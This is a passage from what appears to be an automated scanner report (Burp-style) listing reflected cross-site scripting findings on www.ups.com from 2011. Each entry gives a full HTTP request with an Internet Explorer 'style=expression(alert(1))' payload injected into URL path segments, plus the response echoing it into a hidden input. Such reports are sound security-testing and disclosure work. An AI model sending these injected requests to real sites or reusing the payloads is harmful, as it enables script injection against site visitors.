This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en74567"style="x:expression(alert(1))"c1726c9caa7/about/index.html">
...[SNIP]...

1.22. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f was submitted in the REST URL parameter 2. This input was echoed as 73b92"style="x:expression(alert(1))"42a5a1abd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us73b92"style="x:expression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.23. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1 was submitted in the REST URL parameter 3. This input was echoed as 9aa1f"style="x:expression(alert(1))"2fac5398be1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en9aa1f"style="x:expression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.24. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1 was submitted in the REST URL parameter 2. This input was echoed as e708d"style="x:expression(alert(1))"1e47b8d55c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/use708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/use708d"style="x:expression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.25. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55c63"style%3d"x%3aexpression(alert(1))"76498229caa was submitted in the REST URL parameter 3. This input was echoed as 55c63"style="x:expression(alert(1))"76498229caa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en55c63"style%3d"x%3aexpression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en55c63"style="x:expression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.26. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca67"style%3d"x%3aexpression(alert(1))"e8465dd6765 was submitted in the REST URL parameter 2. This input was echoed as aca67"style="x:expression(alert(1))"e8465dd6765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usaca67"style%3d"x%3aexpression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usaca67"style="x:expression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.27. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8 was submitted in the REST URL parameter 3. This input was echoed as 1e239"style="x:expression(alert(1))"aa66e09bfd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en1e239"style="x:expression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.28. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317 was submitted in the REST URL parameter 2. This input was echoed as 68f09"style="x:expression(alert(1))"4a5c6425317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us68f09"style="x:expression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.29. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96520"style%3d"x%3aexpression(alert(1))"18844fce5ae was submitted in the REST URL parameter 3. This input was echoed as 96520"style="x:expression(alert(1))"18844fce5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96520"style%3d"x%3aexpression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96520"style="x:expression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.30. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4 was submitted in the REST URL parameter 2. This input was echoed as 4eb22"style="x:expression(alert(1))"34b6ca681d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us4eb22"style="x:expression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.31. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea was submitted in the REST URL parameter 3. This input was echoed as 40e6f"style="x:expression(alert(1))"5407b987dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en40e6f"style="x:expression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.32. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a was submitted in the REST URL parameter 2. This input was echoed as 684d5"style="x:expression(alert(1))"735d7daa35a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us684d5"style="x:expression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.33. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a was submitted in the REST URL parameter 3. This input was echoed as f0bf3"style="x:expression(alert(1))"ea82c99023a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf0bf3"style="x:expression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.34. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8 was submitted in the REST URL parameter 2. This input was echoed as 34efe"style="x:expression(alert(1))"5e7fe6716d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us34efe"style="x:expression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.35. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11694"style%3d"x%3aexpression(alert(1))"b9967f4690e was submitted in the REST URL parameter 3. This input was echoed as 11694"style="x:expression(alert(1))"b9967f4690e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en11694"style%3d"x%3aexpression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en11694"style="x:expression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.36. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7 was submitted in the REST URL parameter 2. This input was echoed as c4ffa"style="x:expression(alert(1))"baeeaabbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7/en/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44984


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc4ffa"style="x:expression(alert(1))"baeeaabbf7/en/about/sites.html">
...[SNIP]...

1.37. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37ff"style%3d"x%3aexpression(alert(1))"31afa948299 was submitted in the REST URL parameter 3. This input was echoed as b37ff"style="x:expression(alert(1))"31afa948299 in the application's response.

